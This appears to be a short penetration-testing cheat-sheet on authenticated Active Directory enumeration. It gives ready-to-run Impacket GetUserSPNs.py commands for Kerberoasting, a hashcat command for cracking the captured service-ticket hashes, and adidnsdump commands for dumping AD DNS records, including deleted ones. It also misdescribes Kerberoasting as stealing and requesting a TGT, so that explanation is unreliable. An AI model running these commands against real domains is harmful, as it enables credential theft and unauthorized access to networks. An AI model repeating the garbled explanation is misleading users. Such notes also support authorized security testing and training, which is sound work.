auth-enumeration

Much of the same enumeration is done after you get authentication, so go back and redo your enumeration just use the creds you now have. Once you completed that you can come back here and see what else you can do.

Kerberosatble Users

Kerberoasting is an attack technique that involves stealing the Kerberos Ticket-Granting Ticket (TGT) of a user and using it to request service tickets for other systems on the network. Impacket is a collection of Python scripts that can be used to perform Kerberoasting attack. Here's a general process for performing Kerberoasting using Impacket:

1. Install Impacket: You will need to have Impacket installed on your system in order to use the Kerberoast script. You can install Impacket by running the following command:

Copy code

pip install impacket

1. Get a list of user accounts: To perform Kerberoasting, you will need a list of user accounts in the target AD domain. You can use the Impacket GetUserSPNs.py script to enumerate the user accounts in the domain.

Copy code

GetUserSPNs.py -dc-ip <DC_IP> <domain>/<user>

1. Request TGT for the user: Once you have a list of user accounts, you can use the Impacket GetUserSPNs.py script to request TGT for the user

Copy code

GetUserSPNs.py -request -dc-ip <DC_IP> <domain>/<user>

1. Crack the hashes with hashcat

Copy code

hashcat -m 13100 -a 0 <path to hashes> <path to wordlist>

DNS Enumeration

adidnsdump -u '<FQDN>\<username>' -p '<password>' <NS server>

It might be useful to see tombstoned (deleted) records.

adidnsdump --include-tombstoned -u '<FQDN>\<username>' -p '<password>' <NS server>